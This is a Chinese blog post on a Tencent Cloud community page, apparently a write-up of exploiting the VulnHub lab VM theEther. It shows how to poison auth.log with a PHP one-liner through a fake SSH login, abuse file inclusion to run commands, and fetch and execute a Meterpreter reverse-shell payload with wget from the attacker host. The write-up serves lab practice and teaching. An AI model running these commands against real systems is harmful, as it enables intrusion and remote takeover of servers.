首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

一个文件包含漏洞利用实践

vulnhub里有一个靶机theEther提供了一个文件包含漏洞利用,很有意思,本周末实践了一下,

下载地址,http://download1023.mediafire.com/6uc2tqcmhgfg/502nbnbkarsoisb/theEther.zip,

首先在局域网内找到这个靶机,家用宽带环境,基本都是平板和手机,看到开http和ssh的肯定就是它了,

再详细扫一下服务信息,其实对漏洞利用没啥用,

访问一下页面看看,

从网上看到有人介绍/var/log/auth.log存在文件包含漏洞,

注意,下面的思路就很厉害了,

假装ssh登录,

ssh ''@192.168.128.101,

不知道密码没关系,一路回车,

这就在/var/log/auth.log里种了个一句话木马,

验证一下,

curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode cmd="pwd;ls" http://192.168.128.101 |less,

说明一句话木马生效了,

接下来看看怎么开一个反弹shell过来,

做一个meterpreter反弹shell可执行程序,

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.128.104 LPORT=4444 -f elf > shell.elf,

本地开一个http服务,python -m SimpleHTTPServer 80,

本地再开一个meterpreter反弹shell监听,

use exploit/multi/handler,

set payload linux/x86/meterpreter/reverse_tcp,

set LHOST 192.168.128.104,

exploit,

再重新ssh登录一下,

ssh ''@192.168.128.101,

把命令传进去,下载可执行程序并执行,

curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode cmd="wget http://192.168.128.104/shell.elf;chmod +x shell.elf;./shell.elf" http://192.168.128.101,

meterpreter反弹shell就过来了,

接下来可以再继续提权啥的,不再详述了。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20190113G0OP4700?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券